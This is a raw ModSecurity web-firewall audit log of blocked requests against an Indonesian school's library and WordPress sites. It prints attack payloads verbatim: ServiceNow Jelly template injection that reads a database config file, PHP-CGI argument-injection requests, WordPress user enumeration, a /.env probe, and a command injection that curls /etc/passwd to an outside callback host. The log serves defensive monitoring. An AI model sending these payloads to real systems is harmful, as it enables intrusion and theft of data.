/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162479266 --e0a0d24b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e0a0d24b-E-- --e0a0d24b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748380128943637 2987 (- - -) Stopwatch2: 1748380128943637 2987; combined=1141, p1=458, p2=651, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0a0d24b-Z-- --9b11e13e-A-- [28/May/2025:04:12:07 +0700] aDYqpw3r-0gDryHAyD-J3wAAAEs 103.236.140.4 57396 103.236.140.4 8181 --9b11e13e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162480094 --9b11e13e-C-- --9b11e13e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b11e13e-E-- --9b11e13e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748380327402151 3660 (- - -) Stopwatch2: 1748380327402151 3660; combined=2202, p1=461, p2=1709, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b11e13e-Z-- --d70ce97a-A-- [28/May/2025:04:12:08 +0700] aDYqqOszXCullgn3bbFh8wAAAAE 103.236.140.4 57416 103.236.140.4 8181 --d70ce97a-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168873572 --d70ce97a-C-- --d70ce97a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d70ce97a-E-- --d70ce97a-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748380328411759 4239 (- - -) Stopwatch2: 1748380328411759 4239; combined=2274, p1=488, p2=1755, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d70ce97a-Z-- --0b9de845-A-- [28/May/2025:04:12:09 +0700] aDYqqQ3r-0gDryHAyD-J5QAAAFg 103.236.140.4 57436 103.236.140.4 8181 --0b9de845-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162480109 --0b9de845-C-- --0b9de845-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b9de845-E-- --0b9de845-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748380329393091 4226 (- - -) Stopwatch2: 1748380329393091 4226; combined=2209, p1=495, p2=1681, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b9de845-Z-- --ef9b5637-A-- [28/May/2025:04:12:10 +0700] aDYqqhwBHP_x2VCWa044CwAAAM8 103.236.140.4 57456 103.236.140.4 8181 --ef9b5637-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168873587 --ef9b5637-C-- --ef9b5637-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef9b5637-E-- --ef9b5637-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748380330393533 3738 (- - -) Stopwatch2: 1748380330393533 3738; combined=1968, p1=456, p2=1484, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef9b5637-Z-- --4ec09526-A-- [28/May/2025:04:35:43 +0700] aDYwL_nnEwDNUSjDseLcjQAAAJc 103.236.140.4 51398 103.236.140.4 8181 --4ec09526-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 54.183.67.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 54.183.67.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4ec09526-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ec09526-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748381743911526 5033 (- - -) Stopwatch2: 1748381743911526 5033; combined=2539, p1=689, p2=1790, p3=0, p4=0, p5=60, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ec09526-Z-- --879cc304-A-- [28/May/2025:04:45:00 +0700] aDYyXA3r-0gDryHAyD-QuAAAAFM 103.236.140.4 59468 103.236.140.4 8181 --879cc304-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.77.62.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.77.62.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --879cc304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --879cc304-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748382300976941 3533 (- - -) Stopwatch2: 1748382300976941 3533; combined=1430, p1=477, p2=921, p3=0, p4=0, p5=31, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --879cc304-Z-- --aeac2718-A-- [28/May/2025:04:52:15 +0700] aDY0Dw3r-0gDryHAyD-SZgAAAFU 103.236.140.4 37582 103.236.140.4 8181 --aeac2718-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 194 User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166182756 --aeac2718-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0qa44pgpeoi1bmoheagzou6deo3np7ix.oast.live) --aeac2718-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeac2718-E-- --aeac2718-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748382735717884 2396 (- - -) Stopwatch2: 1748382735717884 2396; combined=808, p1=478, p2=300, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeac2718-Z-- --3bbbff00-A-- [28/May/2025:05:05:24 +0700] aDY3JA3r-0gDryHAyD-UNQAAAFQ 103.236.140.4 48524 103.236.140.4 8181 --3bbbff00-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/107.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162490694 --3bbbff00-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3bbbff00-E-- --3bbbff00-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748383524777928 3667 (- - -) Stopwatch2: 1748383524777928 3667; combined=1701, p1=582, p2=1076, p3=0, p4=0, p5=43, sr=140, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bbbff00-Z-- --07c07817-A-- [28/May/2025:06:02:11 +0700] aDZEcw3r-0gDryHAyD-eiwAAAFE 103.236.140.4 40152 103.236.140.4 8181 --07c07817-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.184.143.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.184.143.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --07c07817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07c07817-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748386931805049 2989 (- - -) Stopwatch2: 1748386931805049 2989; combined=1441, p1=441, p2=969, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c07817-Z-- --c98e107e-A-- [28/May/2025:07:59:29 +0700] aDZf8fnnEwDNUSjDseIBywAAAIU 103.236.140.4 33014 103.236.140.4 8181 --c98e107e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 59.103.36.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 59.103.36.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c98e107e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c98e107e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748393969229554 3594 (- - -) Stopwatch2: 1748393969229554 3594; combined=1522, p1=510, p2=975, p3=0, p4=0, p5=36, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c98e107e-Z-- --744b333a-A-- [28/May/2025:08:10:13 +0700] aDZideszXCullgn3bbGPBQAAAAk 103.236.140.4 33100 103.236.140.4 8181 --744b333a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.238.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.238.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --744b333a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --744b333a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748394613832406 2407 (- - -) Stopwatch2: 1748394613832406 2407; combined=1233, p1=403, p2=795, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --744b333a-Z-- --7d45c377-A-- [28/May/2025:08:16:25 +0700] aDZj6eszXCullgn3bbGPCAAAABc 103.236.140.4 33168 103.236.140.4 8181 --7d45c377-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 101.46.7.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 101.46.7.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7ad-imcjapan-syosyaman-xkgi3lqg03!wgz Proxy-Connection: close --7d45c377-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d45c377-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748394985911897 1914 (- - -) Stopwatch2: 1748394985911897 1914; combined=697, p1=292, p2=380, p3=0, p4=0, p5=25, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d45c377-Z-- --5e3e5033-A-- [28/May/2025:08:34:29 +0700] aDZoJRwBHP_x2VCWa05nSwAAAMk 103.236.140.4 33224 103.236.140.4 8181 --5e3e5033-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 Accept-Charset: utf-8 --5e3e5033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e3e5033-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748396069192253 917 (- - -) Stopwatch2: 1748396069192253 917; combined=376, p1=329, p2=0, p3=0, p4=0, p5=47, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
